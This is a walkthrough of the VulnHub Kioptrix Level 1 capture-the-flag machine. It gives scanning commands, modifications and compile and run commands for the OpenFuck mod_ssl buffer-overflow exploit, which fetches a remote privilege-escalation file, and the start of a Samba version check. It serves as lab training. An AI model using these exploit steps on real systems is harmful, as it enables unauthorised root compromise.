Kioptrix: Level 1 Walkthrough

5 min readFeb 16, 2021

URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Release Date: 11 Feb 2011

Provided description: This Kioptrix VM Image are easy challenges. The objective of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

#Exploit 1

Let’s start with a basic enumeration using nmap scan:

nmap -sV -p- ipaddress

We found some interesting things here, we have Apache 1.3.20 running on both 80 and 443 with mod_ssl 2.8.4.

Let’s try nikto now:

As we can see on the screenshot at ‘1’, the machine is vulnerable to CVE-2002–0082, and searching on exploit-db.com we found the following exploit:

Offensive Security's Exploit Database Archive

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1). CVE-2002-0082CVE-857 . remote exploit for…

www.exploit-db.com

We have to compile it before run, but because it is a little bit old, we have to do some modifications in the code:

1) Add those headers :

#include <openssl/rc4.h>
#include <openssl/md5.h>
#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

2) Update the URL of the C file.

Search for wget

and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get libssl-dev lib

Install them :

apt-get install libssl-dev

4) Update declaration of variables

Line 970, change it by adding const:

const unsigned char *p, *end;

5) Replace the “if” on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {

6) Replace the “encrypted_key_length” code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

You can also find the updated exploit on my github if you don’t want to make all of these modifications:

https://github.com/RafaelM1994/InfoSec/blob/master/c_files/openfuck_updated.c

Compile the code with:

gcc -o openfuck openfuck_updated.c -lcrypto

Now that we have the code, we can run it for the first time and select the correct offset for the Apache version that is running on the victim server:

Knowing the offset, let’s run the command and get the root shell, the syntax is the following:

./openfuck 0x6b <victim’sIP> 443 -c 40

It’s worth noting that the victim’s machine needs to have internet connection, otherwise it won’t download the ptrace-kmod.c file to escalate privileges and you will end up with apache’s user instead of root.

#Exploit 2

As you may noticed, the server has 139 port open running samba, to find out if we can exploit it, we have to find its version. Unfortunately, because the vm is old, neither nmap nor smbclient could detect the version of this service, therefore we are going to use wireshark to do so.

First of all, since the machine is using old protocols, we have to enable NT1 on our machine to be able to establish a connection to SMB. Go to /etc/samba/smb.conf, and enable it:

sudo vim /etc/samba/smb.conf

You have to put the following under [global] settings:

client min protocol = NT1

Note that this is not a secure approach, it’s recommended that you disable it after doing the tests.

Before testing the smb connection, open your wireshark and listen to the interface you are connecting to the server.

If you test the connection now, you are able to connect to the server successfully, but still can’t see its version:

Stop wireshark packet capture and search for “Session Setup andX Response” packet, the packet’s source is the victim’s machine:

Expand the “Session Setup andX Response” section, and you’ll see the service version:

We got the version of this service, if we search a little bit, we come up with a vulnerability called CVE-2003-0201. It also has an exploit on exploi-db.com: